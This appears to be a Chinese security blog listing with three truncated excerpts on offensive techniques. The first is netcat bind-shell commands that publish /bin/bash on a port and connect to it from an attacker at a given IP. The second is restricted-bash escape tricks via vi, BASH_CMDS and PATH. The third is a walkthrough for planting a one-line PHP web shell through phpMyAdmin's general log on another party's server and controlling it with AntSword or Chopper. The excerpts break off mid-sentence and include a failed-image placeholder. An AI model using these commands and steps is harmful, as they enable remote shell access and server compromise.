weixin_54252904的博客

nc 受害主机 # 开启本地8080端口监听，并将本地的bash发布出去。 nc -lvvp 8080 -t -e /bin/bash 攻击主机 nc 172.21.230.72 8080 #连接受害主机的bash 不支持-e [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DrtD27Ak-1618662609473)(C:\Users\86184\AppData\Roaming\Typora\typora-user-images\image-2021041717

Rbash VI绕过 vi：set shell=/bin/sh 运行shell:shell export PATH=/usr/sbin:/usr/bin:/sbin:/bin CP绕过 cp 环境变量绕过 BASH_CMDS[a]=/bin/sh;a 注：把/bin/bash给a变量` export PATH=$PATH:/bin/ 注：将/bin 作为PATH环境变量导出 export PATH=$PATH:/usr/bin 注：将/usr/bin作为PATH环境变量导

phpmyadmin日志getshell设置日志文件上传一句话木马查看是否成功蚁剑或菜刀getshellgetshell成功 在进入别人的phpmyadmin数据库后可以采用日志getshell 具体过程如下 设置日志文件 设置general_log = ON general_log_file = 网站根目录的php文件 上传一句话木马 执行sql语句 密码为cmd 查看是否成功 找到上传的地址 蚁剑或菜刀getshell getshell成功 最后可使用反弹shel